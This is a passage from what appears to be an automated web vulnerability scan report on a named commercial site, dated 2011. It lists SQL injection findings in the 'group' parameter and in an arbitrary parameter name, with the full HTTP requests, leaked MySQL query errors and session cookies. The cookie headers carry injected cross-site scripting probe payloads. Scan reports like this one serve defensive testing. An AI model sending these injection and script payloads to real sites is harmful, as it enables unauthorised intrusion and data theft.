Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:31:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=277t1g9lrm987l6ena0vukfhe1; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/incn00/project_dynamic_page_updated.php was not found on this server.</p>

1.425. http://www.insideup.com/ppc/leadflow/incn00/project_dynamic_page_updated.php [group parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project_dynamic_page_updated.php

Issue detail

The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00'&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:31:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=p2p1pqg4p3l5eo5oo2gq9tb113; path=/
Content-Length: 2494
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
adflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00'&template=3' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php?ca' at line 5

Request 2

GET /ppc/leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00''&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:31:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=i3tdhgd0dlg5pog76k9pp9kjn4; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/incn00/project_dynamic_page_updated.php was not found on this server.</p>

1.426. http://www.insideup.com/ppc/leadflow/incn00/project_dynamic_page_updated.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project_dynamic_page_updated.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:35:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=p0fjtfeu4mm7306md9ahgt4v92; path=/
Content-Length: 2526
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ncn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3&1'=1' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php?ca' at line 5

Request 2

GET /ppc/leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3&1''=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 